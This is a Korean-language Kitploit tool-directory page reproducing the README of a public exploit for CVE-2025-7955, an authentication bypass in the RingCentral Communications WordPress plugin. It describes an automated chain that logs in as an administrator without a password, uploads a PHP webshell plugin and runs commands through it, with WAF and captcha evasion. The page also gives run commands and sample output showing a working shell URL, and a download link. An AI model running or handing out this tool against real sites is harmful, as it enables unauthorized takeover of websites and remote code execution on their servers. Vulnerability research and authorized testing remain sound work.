Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-7955 — RingCentral Communications 1.5 - 1.6.8 - ringcentral_admin_login_2fa_verify 함수를 통한 인증 우회를 유발하는 서버 측 검증 누락 | Kitploit
도구/GitHubGitHub/nxploited/cve-2025-7955
Payload GenerationVulnerability AnalysisExploitationShellcodeWeb Application ExploitationPenetration TestingCommand and ControlAuthenticationRed Teaming
GitHubnxploited/cve-2025-7955

CVE-2025-7955

RingCentral Communications 1.5 - 1.6.8 - ringcentral_admin_login_2fa_verify 함수를 통한 인증 우회를 유발하는 서버 측 검증 누락

131년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기

CVE-2025-7955

RingCentral Communications 1.5 - 1.6.8 - ringcentral_admin_login_2fa_verify 함수의 서버 측 검증 누락으로 인한 인증 우회

🚨 CVE-2025-7955 | RingCentral Communications WordPress 익스플로잇


📝 취약점 개요

CVE: CVE-2025-7955
영향 받는 플러그인: RingCentral Communications (WordPress)
영향 받는 버전: 1.5 – 1.6.8
CVSS 점수: 9.8 (치명적)
유형: 인증 우회 (서버 측 검증 누락)

RingCentral Communications WordPress 플러그인은 ringcentral_admin_login_2fa_verify() 함수 내 잘못된 검증으로 인해 인증 우회에 취약합니다. 1.5 ~ 1.6.8 버전에서는 인증되지 않은 공격자가 동일한 가짜 코드를 제공하기만 하면 임의의 사용자로 로그인할 수 있습니다.


⚡ 스크립트 기능

이 익스플로잇은 CVE-2025-7955에 대한 전체 공격 체인을 자동화합니다. 다음을 위해 설계되었습니다:

  • 인증 우회: 이 스크립트는 취약한 2FA 엔드포인트를 악용하여 비밀번호 없이 WordPress에 임의의 사용자(보통 관리자)로 로그인합니다.
  • 사용자 이름 자동 발견: 사용자 이름이 제공되지 않으면 스크립트는 WordPress REST API(/wp-json/wp/v2/users/ID)를 통해 이를 열거하려고 시도합니다.
  • 필요한 토큰 추출: 플러그인 업로드에 필요한 CSRF 보호 논스를 자동으로 가져옵니다.
  • 악성 플러그인(웹셸) 업로드: 인증이 완료되면 스크립트는 PHP 웹셸이 포함된 ZIP 플러그인을 업로드합니다.
  • 웹셸을 통한 명령 실행: 업로드에 성공하면 스크립트는 셸을 통해 whoami를 실행하여 코드 실행을 시연하고 출력을 출력합니다.
  • 스텔스 및 회피 기능: 무작위 지연, 순환 User-Agent 목록, 기본 WAF/captcha 탐지를 사용하여 간단한 보호 기능을 우회합니다.

🚀 사용법

  1. 악성 플러그인 준비
    스크립트와 같은 디렉터리에 악성 플러그인 ZIP 파일(기본값: Nxploit.zip)이 있는지 확인하세요.

  2. 익스플로잇 실행:

    root@kitploit:~
    python3 CVE-2025-7955.py -u http://target/wordpress [-user admin] [-id 1] [-z Nxploit.zip]
    
    • -u, --url : (필수) 대상 WordPress 사이트 URL
    • -user, --username : (선택) 로그인할 사용자 이름 (생략 시 자동 발견됨)
    • -id, --id_admin : (기본값: 1) 사용자 ID (admin은 보통 ID 1)
    • -z, --zip : (기본값: Nxploit.zip) 악성 플러그인 ZIP 경로
  3. 예시:

    root@kitploit:~
    python3 CVE-2025-7955.py -u http://target/wordpress
    

    또는 사용자 이름/ID 지정:


✅ 예상 성공 출력

root@kitploit:~
888b    888                   888          d8b 888                 888 
8888b   888                   888          Y8P 888                 888 
88888b  888                   888              888                 888 
888Y88b 888 888  888 88888b.  888  .d88b.  888 888888 .d88b.   .d88888 
888 Y88b888 `Y8bd8P' 888 "88b 888 d88""88b 888 888   d8P  Y8b d88" 888 
888  Y88888   X88K   888  888 888 888  888 888 888   88888888 888  888 
888   Y8888 .d8""8b. 888 d88P 888 Y88..88P 888 Y88b. Y8b.     Y88b 888 
888    Y888 888  888 88888P"  888  "Y88P"  888  "Y888 "Y8888   "Y88888 
                     888                                               
                     888                                               
                     888                                               
CVE-2025-7955 Exploit By : Nxploited 

[*] Using User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
[*] Attempting login as: admin (ID: 1)
[+] Login successful!
[+] Nonce: 661e57f2e4
[*] Uploading malicious plugin...
[+] Plugin uploaded successfully!
[*] Executing: whoami
----------------------------------------
daemon
----------------------------------------
[+] Shell: http://target/wordpress/wp-content/plugins/Nxploit/index.php?cmd=COMMAND

🎯 주요 기능

  • 비밀번호 불필요: 논리적 결함을 악용하여 인증을 완전히 우회합니다.
  • 자동 열거: 공개 API를 통해 사용자 이름과 ID를 추출할 수 있습니다.
  • 무인 공격: 로그인부터 웹셸 업로드, 명령 실행까지 모든 단계가 자동화됩니다.
  • 기본 우회: 무작위 지연, 헤더 스푸핑, 기본 보호 탐지를 사용합니다.
  • 모듈식: 플러그인 페이로드를 쉽게 수정하거나 필요에 따라 기능을 추가할 수 있습니다.

⚠️ 면책 조항

이 도구는 승인된 보안 테스트 및 교육 목적으로만 사용됩니다.
소유하지 않았거나 테스트에 대한 명시적 허가를 받지 않은 시스템에 대한 무단 사용은 불법이며 비윤리적입니다.
저자는 이 스크립트로 인한 오용 또는 손해에 대해 책임을 지지 않습니다.


제작: Khaled Alenazi (Nxploited)

도구 다운로드
root@kitploit:~
python3 CVE-2025-7955.py -u http://target/wordpress -user admin -id 1